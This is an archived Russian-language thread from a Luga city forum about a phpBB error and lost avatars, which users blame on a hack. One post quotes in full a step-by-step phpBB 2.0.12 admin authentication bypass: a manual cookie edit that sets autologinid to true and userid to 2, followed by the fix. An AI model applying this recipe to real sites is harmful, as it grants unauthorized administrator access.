Форумы города Луги - Что это значит???

Форумы города Луги (http://xn--80afx6a.xn--p1ai/index.php)

- Общие вопросы (http://xn--80afx6a.xn--p1ai/forumdisplay.php?f=22)

- - Что это значит??? (http://xn--80afx6a.xn--p1ai/showthread.php?t=918)

Что это значит???

Захожу на форум, а он мне выдаёт:

Цитата:

phpBB : Critical Error

Could not get theme data for themes_id [9]

Что это значит, и как с этим бороться????? :shock:
Раньше усё работало :cry:

Что это значит???

Спасибо, теперь работает)))

Что это значит???

кто-то хакнул форумец походу...
все темы улетели в трубу... зайти могли только те у кого они дефолтовые были...
аватары так до сих пор не оклемались....

Что это значит???

Цитата:

Сообщение от Mike

М-да, ситуевина... :cry: Я у себя темы вроде все вижу, а вот аватары - да похоже и вправду крякнули. А кто-нибудь переустанавливать пробовал :?: :roll:

Что это значит???

Скорее всего переустанавливать и пробовали... хотя, надо Диму спросить что тут произошло...

Что это значит???

да непорядок надо устронить а как димон SOS!!!!!!!!!!!!!

Re: Что это значит???

Цитата:

Сообщение от Шульдих

Захожу на форум, а он мне выдаёт:

Цитата:

phpBB : Critical Error

Could not get theme data for themes_id [9]

Что это значит, и как с этим бороться????? :shock:
Раньше усё работало :cry:

Да пришлось форум переставить. Кто-то все темы снес.

Re: Что это значит???

Цитата:

Сообщение от AiS

Да пришлось форум переставить. Кто-то все темы снес.

И кто это был? Если не секрет...

Что это значит???

Блин, значит, не только у меня глюки?! А я думаю: куда аватары пропали :cry:

Что это значит???

Ну я то свою быстро восстановил...

Что это значит???

ну ну я пытался а он мне такое написал короче просто послали на Х :cry:

Что это значит???

Warning: copy(./images/avatars/10331233674267808720172.gif): failed to open stream: Permission denied in /usr/www/center/data/phpBB2/includes/usercp_avatar.php on line 239

Warning: Cannot modify header information - headers already sent by (output started at /usr/www/center/data/phpBB2/includes/usercp_avatar.php:239) in /usr/www/center/data/phpBB2/includes/page_header.php on line 475

Warning: Cannot modify header information - headers already sent by (output started at /usr/www/center/data/phpBB2/includes/usercp_avatar.php:239) in /usr/www/center/data/phpBB2/includes/page_header.php on line 477

Warning: Cannot modify header information - headers already sent by (output started at /usr/www/center/data/phpBB2/includes/usercp_avatar.php:239) in /usr/www/center/data/phpBB2/includes/page_header.php on line 478
вот так то Лелик это что такое и как сним таго покончить.

Что это значит???

Верните мою аватарку!!!!!!!!!!! :cry:

Что это значит???

Это... а форум какой версии стоит? судя по написи снизу "Powered by phpBB © 2001, 2002 phpBB Group" не очень то и новая версия... где-то 2.0.6 наверное, если не меньше...
неплохо бы было че-нить типа 2.0.13 поставить... хотя у него тоже дыры есть, которые в начале этого месяца нашли... =))
:D :D :D

Re: Что это значит???

Цитата:

Сообщение от Alex

И кто это был? Если не секрет...

какая разница кто? это мог сделать любой, прочитав вот это:

Цитата:

Сообщение от exploit

[size=9px]

-----------------------------------

phpBB 2.0.12 Session Handling
Administrator Authentication
Bypass EXPLOIT -SIMPLIFIED-
- By PPC^Rebyte

-----------------------------------

03maa2005

** NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW **

[ ENGLISH VERSION ]

*** Status
__________

phpBB has already been informed about this exploit and has released a
'critical update' on 27 februari 2005, however most forums are still running
version 2.0.12 or lower.

VULNERABLE:
- 2.0.x --> 2.0.12

IMMUNE:
- 2.0.13 or newer

1* Intro
________

The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit
for this bug.

Link to Paisterist's exploit at Packetstormsecurity:
http://packetstormsecurity.org/0503-...phpbbsession.c

This program didn't work as it should on my pc, so I had to find out a way
for myself to exploit the bug manually.
This seemed to be much easier than compiling that C exploit and fool around
with it until it eventually still doesn't work (in my case).
This simplified manual method I'll describe can also be used for Internet
Explorer or other browsers instead of only Mozilla/Firefox.

2* The bug
__________

We're going to edit a cookie so that when you visit a certain forum another
time you will get logged in having admin rights. This is possible due to a
bug in includes/sessions.php
--> if( $sessiondata['autologinid'] == $auto_login_key )

3* Preparation
______________

1. Register at forum?

2. Log in with account
+ UNCHECK "Log in automatically"

3. Close browser to be sure a cookie is made.

4. Locate cookie
*firefox: X:\Documents and Settings\Name\Application
Data\Mozilla\Firefox\Profiles\profile.default\cook ies.txt
--> search the .txt for the domainname (domain.tld)
--> default cookiename = phpbbmysql
*iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
--> default cookiename = phpbbmysql

4* Let's Xploit!
________________

Open the cookie in a text editor and search a line that resembles:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

|
[ your 'user id' ] ____|

Replace this with:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

|
[ 2 = 'user id' of admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save cookie and close.
Open your browser and surf to forum.

You'll now be automatically logged in having admin right :)

5* Solution
___________

* Update phpBB to version 2.0.13

- or -

* in "includes/sessions.php" replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

6* Outro
________

THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

-- PPC^Rebyte --
-- ppc@respected.as --

+++++++++++++++++++++++++++++

[/size]

Что это значит???

кстати, а downloads.php у вас есть?

:D :D :D